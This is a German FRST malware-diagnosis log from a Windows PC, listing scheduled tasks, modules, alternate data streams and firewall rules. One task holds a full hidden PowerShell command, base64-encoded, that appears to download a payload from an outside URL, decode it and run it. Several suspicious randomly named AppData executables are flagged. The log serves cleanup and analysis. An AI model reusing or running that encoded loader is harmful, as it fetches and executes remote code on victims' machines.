Task: {37CB84A8-AF35-4644-BC84-4A252074B883} - System32\Tasks\{DB07113B-F9D0-4E65-8E56-D804EE5D12B8} => pcalua.exe -a C:\Users\Özkan\Downloads\Setup_Lugiiis_Keybinder.exe -d C:\Users\Özkan\Downloads
Task: {5092819E-84BA-4BC9-869E-FAB88E5A99C3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: {5EBFB1F8-88B5-4AEB-9E89-26746BE7A02D} - System32\Tasks\{28325A84-A9DE-5181-98DC-72E8BE19248C} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGwAaQBrAGUAcgB1AHQALgBpAG4AZgBvAC8AdQAvAD8AcQA9AFAAbQBXAHoAQQB2AHYAeABfAGMAcABFAHkAZQA4AFoAUQBPAFcARgBIAHkAUABKAFgAcgBRAHkALQBLAGQAZgB4AG8AUwB6AEsAcABwADkAWQBsAGcAcgBpAEsASQBrAGgAaQBqAG0AYwBIAGkAawBpAHQAWgA5ADEAcQBZAGUAcwA3ADIAWgBwADQAXwBUAFgAMQBZAEEAQgBNAEgAYwBUAHkASQBVAGwAMwBUAEUAcABOAGoALQB3AE4AZwByAGIARgBJAE4ARwB5ADkAUQBPADcAVAA5ADMASQBkAG8AMQBoAHIARgBoADgANgBSAGIAdQBLAEkAZwA3AFMAUgBnAGgAYgBaAHcATQBsAE4ATAByAHgAZQBPAFkASAAzAEoAUgBQAF8ARQBFADEAVQBNADQAZABIAHcASABFAGoAcgBMAEoAYQBRAGMASwBhAEoAdQBiADEAaQBtADAAVQBrAEEAcABDAFoAawBhAHoAcABwAHcATQBnAHIAVQAzAEQASgBFAHoAZwBEADgAegAtAEMAUQAzADQAbwBlAGsAbAB4AFEATABsAGsALQBvADEAVgBOADUAOQBJAEEAZQBhAHkAcgBaAFEAUAB4AG4ASgBXAHEAZQA3ADgAUABfAGEATQBBAFcAeABrAGsAdwBXAFcANwBDAE4ASwB5AFAARABOAHkAaQBDADQATAB1ADkAbgBVADUARQBYAGIAdwBnAHcAUgBHAEkASABNAEYAOABrAGEASQBCAEwARgBlAGYAeABCAEIAawBCADEAWQBUADIASwBoAFoANQBHAHcAMwBnAF8AVQA2AFAAcAB0ADUAOQBxAFAANQBXAEsAagBsAEwAQQAzADIATAA1AE0ANABHADkAawA4AHUARwB2ADMAOQBTAHMAaABCADUAUABnAHkANQB5AGQANQBQAHMAaQBJAFUATgBHADgASAAwAEoAbgBIADEASgBNAGIAbABCAGIAUwB4AGwANQBVAHQATgBWAEgASAB0ADcAVAB1AEsAZgBlAGMAUABHAE8ANgBMAEYAYgBXAC0AbwA2ADYAcQB5AFUATwAxADgAcABRAEIASwBNAHoAawBOAHEAeAB4AEYAcgBXAE4AYwBSAGUAUQBuAEQAcwBsADYANwBkADEATQBwAHYAWgBNAEwAOABFAHAAMgBiAEwAYQBHAHQAcAA0AG4AZgB2AGkAMQBvAEQAOQBZAFcATgAzAFUAJgBjAD0ASwA1AHkARAB0AEoASgBqAGsAZwBGAEMATwAyAFcAcQBJAEsARwBLAEoAZgBsAGwAZwBoAFIAdgBNAFgANQA2AEgAcQBSAHAAMgAyAFAARwB4AFIARQA3AHEAYgBzAEMAVABFAHgAUwBvAG0AQgBnADUAZwBjAFgAUwByADQAZQBVAFQASABfAE8AQgBiAFIAMQAtAGcAeQAxAEsAUQBoAFgANwAzAGkAaABTAEIAXwB2AEEAXwBJAEgAdwB3ADYANABQAHIAVQBMADQAbABWAEIAcABEAFYAWAAzAFgAagBmAHIAUgA0ADkAQwBJAGEAOQBoADEAdgBHAFQAWABHADUAOQBYAEsAaQBQAF8AcwAzAFIAcgB5AG8AZgBpAEYASQBSAE4ATwBZAHIAMABmAFkANQBoAEYAbAAxAF8ATQBJAFgAdgBCAC0AZgA0AFAASQA5ADEAbQBnAGMAaQBpAEIAVgA4ADQAcQBOAEMAQwBsAFQAZwBWAHgAYQBoAC0AegBHAHcAcgBqAEsAYwBHADYAOQBKAFMASgBMAC0AbwBFAGMAdQBsAGcANwBDADEANQBFAFkAUABqAGwANwBNADEAcwBkAGcAcwBDAFIAawBYAFgAWQBLAHAARQBZAFkAcQBZAHIAVQB2AEgAaQB1AFQAaABtAHcAcQBtADcASgBfAHEASgA3AG8AZgBjAG4ANQA2AHEAaABTAHEAeAB0AGoAbQBfAHgAYwBQAHQAYQBXAHMASQB0ADIANgBvAHQATABiADYALQBYAHEAeQB4AF8ARwBtAHUAcQBVAGQASQB6AGIAegAyADQASQAyAHIAQgBnADgAdABJAGgAdABmAFkASQBCAEEAZgAwAFUAbABfAEgAYwBmAGMAbABsAEQAeABIAG8AZQA5AGwATABxADMAaABjAGMARAB6AFUAcwBzAEUAZAA2AEEARAByAHkAMQBBAEcAUQBIADAAbgB1AFIAZQBGAEwAQwAzAFgAMgBKAE4AMAAyAHYANwBaAG0AbABVAEUAdABpAEQARQBuAEwAWABFAFAAMABXAGgAdAA1AHgAdwB0AFMATABSAG8AUwAwAG0ATwBtAGgANAA2AE8ANwBXAHUAdwBZAHYAZAB5AGgAcgByADIAcwBKAEsAVwBrAFYAWABlADkAUABHAFIAeABtAG0AXwA2AEsASQBUAFkANAB2AEQAUQBqAFUAdAAyADYARQAzADMAdgBTAE4AbgBNAE8AUQBQAGQAZQBSAHYAQQB1ADQAYgBzAG8ANQBuAEIAOAAwAGYAOQBlADcAXwBZAGoAVABnAG8AUAByAGYATQBLAHQASwBxAGgAZQBtAFQAawAxAEoAWABEAEsANQBVAGsAMABDAHoATAB3ADYAQQB4AHQAMwBMAFYASQAzAHQANABJAGsARgB0AHkASwBEAHAANAAzAFEARwBSADEAQQBwADIAUABnAEcAMwBvAFUAZgBfADgAOQBfAHYAZgBoAGsATABxAFIAQQBVAE8AMQA1ADEAYQBWADgAWQBLAFIASgAtAEQAQQBsAE8AbQB4AEIAVQB5AFYAQwBUAGkAcQA1AHQAbAAxADAAdwBIAHcAOABHAGoAawBGAHIAbgBSAEQAZABLAGwARwBSAFAAdwBQAGkAUQBrAGEAYQBQADkAVQBGAEQAcgA0AEcAMwBEAEYAdQB2AFIAaAA4ADkASgBpAFoAQwB4AGEAQwBhAEcAdQAzADMAWQBxAEYAXwAtAHQAYwBpAFYAVQBnAGcARwBVADkAdABOAHoAdwB0ADkAJgByAD0AMQA2ADQAMwAwADAAOQAzADAAOQA4ADcAMwA3ADgANQAxADMANAAiADsAJABzAHQAcwBrAD0AIgB7ADIAOAAzADIANQBBADgANAAtAEEAOQBEAEUALQA1ADEAOAAxAC0AOQA4AEQAQwAtADcAMgBFADgAQgBFADEAOQAyADQAOABDAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {6547E57D-4808-40FB-9FA9-C1A592A6F982} - System32\Tasks\{BA18FF5F-EC80-4F08-B6A5-67790B43475D} => pcalua.exe -a "C:\Program Files (x86)\Plus-HD-5.0\Uninstall.exe" -c /fromcontrolpanel=1
Task: {6C3547A8-0D1D-4FDE-AEBA-6176B3E9FCD5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {8FB4BCDC-484E-4E5D-8A4F-4624732C64C5} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {9CDF866B-9C28-4409-A728-713E5A1BEA5A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {9FCCD376-FC5D-448B-849A-79A2205FF57C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-07-22] (Piriform Ltd)
Task: {A04598EA-0499-4F37-9782-5B24163322DF} - \Plus-HD-5.0-codedownloader -> Keine Datei <==== ACHTUNG
Task: {A0968CD4-D421-49DB-9263-225E4A391C1C} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2015-12-15] (AVAST Software)
Task: {ACFF0C35-B6D7-4F3E-B0F0-613FC3D60A40} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {D97022AC-E5C8-4C9A-AD06-69969C655663} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {DD46DE76-7339-48AB-8295-84A25F09A341} - System32\Tasks\gg_uac_daemon_Özkan => C:\Users\Özkan\Documents\my games\PB\gamedata\ggdllhost.exe
Task: {DEDEDC1E-CAA1-43C4-B91B-2464B34057A5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-09] (Adobe Systems Incorporated)
Task: {FA896F4F-A556-4D46-9FA7-07A5D8BE02BF} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\KYG1QOVT.job => C:\Users\�zkan\AppData\Roaming\KYG1QOVT.exe <==== ACHTUNG
Task: C:\Windows\Tasks\lm6V3l7.job => C:\Users\�zkan\AppData\Roaming\lm6V3l7.exe <==== ACHTUNG
Task: C:\Windows\Tasks\QiQMvbuugirF3MbSxPFk0Y.job => C:\Users\�zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe <==== ACHTUNG
Task: C:\Windows\Tasks\rmMkisrweHV4RuaBdLxOYzzbuC5.job => C:\Users\�zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe <==== ACHTUNG

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-09-11 18:02 - 2015-09-11 18:02 - 00803488 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2013-07-29 19:38 - 2012-03-27 01:33 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-10-18 15:40 - 2014-10-18 15:40 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\1eeea3ab8d69ec722bdcb28b8eb8dd75\IsdiInterop.ni.dll
2013-07-29 19:34 - 2012-02-01 15:25 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2013-07-29 19:51 - 2012-02-08 02:39 - 01198872 ____R () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
2015-12-18 19:40 - 2015-11-10 20:55 - 00778752 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-12-18 19:40 - 2015-07-03 17:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-12-18 19:40 - 2015-07-03 17:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-12-18 19:40 - 2015-07-03 17:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2015-12-18 19:40 - 2015-12-14 21:01 - 02547280 _____ () C:\Program Files (x86)\Steam\video.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 02549248 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2015-12-18 19:40 - 2015-09-24 01:33 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2015-12-18 19:40 - 2015-12-14 21:01 - 00804432 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2015-12-18 19:40 - 2015-11-03 23:00 - 00201728 _____ () C:\Program Files (x86)\Steam\bin\openvr_api.dll
2015-12-18 19:40 - 2015-11-17 01:31 - 47846176 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-12-18 19:40 - 2015-09-25 00:56 - 00119208 _____ () C:\Program Files (x86)\Steam\winh264.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData:NT
AlternateDataStreams: C:\ProgramData:NT2
AlternateDataStreams: C:\Users\All Users:NT
AlternateDataStreams: C:\Users\All Users:NT2
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2
AlternateDataStreams: C:\ProgramData\Application Data:NT
AlternateDataStreams: C:\ProgramData\Application Data:NT2
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2
AlternateDataStreams: C:\Users\Özkan\Anwendungsdaten:NT
AlternateDataStreams: C:\Users\Özkan\Anwendungsdaten:NT2
AlternateDataStreams: C:\Users\Özkan\AppData\Roaming:NT
AlternateDataStreams: C:\Users\Özkan\AppData\Roaming:NT2

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 80.69.100.212 - 80.69.100.205
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

MSCONFIG\startupreg: FlashPlayerUpdate => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_152_Plugin.exe -update plugin
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{0C8F46B7-5D5F-431E-ADA8-8C17F61322AB}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{E7350369-DD38-419A-A7AF-738A7A50CDBC}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [TCP Query User{21455C06-6716-43BB-B154-3F07883EB7B7}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [UDP Query User{F2CA4BCA-A699-4C84-ABE1-D89C204D6ABD}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [TCP Query User{21B1FB1D-2CBC-4F19-81F1-C5D31357AD35}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{F7DE5662-1CF5-4B3B-BD74-2EB8428174E5}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{DEB02161-3321-47A0-AEA7-B2383C6BA060}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{FB4E551E-3204-49F0-B2E0-CB812EE3A090}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6A2AD480-2EC5-4D0D-8CB4-7039D1BBB43E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8651B310-EA93-453B-AD4F-40F2F79E12F0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{908DEC77-2B49-4353-9F1D-67741687723B}] => (Allow) C:\Users\Ízkan\AppData\Roaming\Allmyapps\Allmyapps.exe
FirewallRules: [{BC440707-1268-4FE6-8896-03C83B5CFA5A}] => (Allow) LPort=80
FirewallRules: [{7C191149-D60C-454F-BB4A-F7265ACB46CF}] => (Allow) LPort=443
FirewallRules: [{96971A66-F6FB-41DF-821C-21A0F7C12744}] => (Allow) LPort=20010
FirewallRules: [{E9BB6E6B-67B0-45E3-8623-49821FF5A323}] => (Allow) LPort=3478
FirewallRules: [{A4796F1F-3471-40D3-82D3-67944C8F43DE}] => (Allow) LPort=7850
FirewallRules: [{38C3ED5B-5D9E-45AE-A2AC-2207C39E6DA2}] => (Allow) LPort=7852
FirewallRules: [{1CB0A71B-E2AE-43F6-97D1-91A6597BB8DB}] => (Allow) LPort=7853
FirewallRules: [{05C3202C-A18B-442D-A41A-6A7E5A065476}] => (Allow) LPort=27022
FirewallRules: [{F2027DFF-A0EE-4864-AFDA-5CC65BF9DCCF}] => (Allow) LPort=6881
FirewallRules: [{9F9F40DE-AE70-402C-8933-01A2A8BBE4F0}] => (Allow) LPort=33333
FirewallRules: [{DE71CD73-ADBE-4568-B562-DF04FE72D7AF}] => (Allow) LPort=20443
FirewallRules: [{164E1F9E-F18B-426F-9465-FCACC259547D}] => (Allow) LPort=8090
FirewallRules: [{1B75EAAA-850B-495E-B33B-11EE792B861A}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{4810EF78-A419-472B-83C2-A984D46F0A45}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{E209841A-EAD7-48BF-A32C-16171256B2BE}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{EE245FBD-7B09-4516-A65F-98112C18D269}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{C39A06DD-8B8E-4B76-B572-6843C4A5E418}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{45E9FB0F-2578-4E3B-A99E-D01C3F9E6B8C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{3AB4B367-747D-4F9C-804F-8FAAE655C533}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{3B95664C-65E3-4BF5-9451-4D722331E4F7}] => (Allow) LPort=2869
FirewallRules: [{4E8A21D5-4E9C-4ED4-926B-A82DA60AE973}] => (Allow) LPort=1900
FirewallRules: [{4705FBF4-0593-4D22-8199-94CEDA53A957}] => (Allow) C:\Users\Özkan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{C164648D-CE05-4A1E-A788-D034663CDEBF}] => (Allow) C:\Users\Özkan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{3FE1533B-F968-442A-B4F5-0C0D9A5FF04C}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{2285214F-608D-43DE-8C80-3D7C66FC8182}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{9DF2F638-22A2-46EF-8561-26D2A88308F8}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{8595951D-5034-4341-935A-AE3B325BDA5E}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{0EC9DAF6-6768-4531-BA4B-FF70797749AF}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{DCFCEE64-AD4E-401B-AE64-2A933CC8B06B}] => (Allow) C:\Nexon\Combat Arms EU\NMService.exe
FirewallRules: [{9DBCB308-62B2-43B7-B834-B92F772D5BA2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4FF22754-95A5-4C16-96BD-19F379D43BA8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
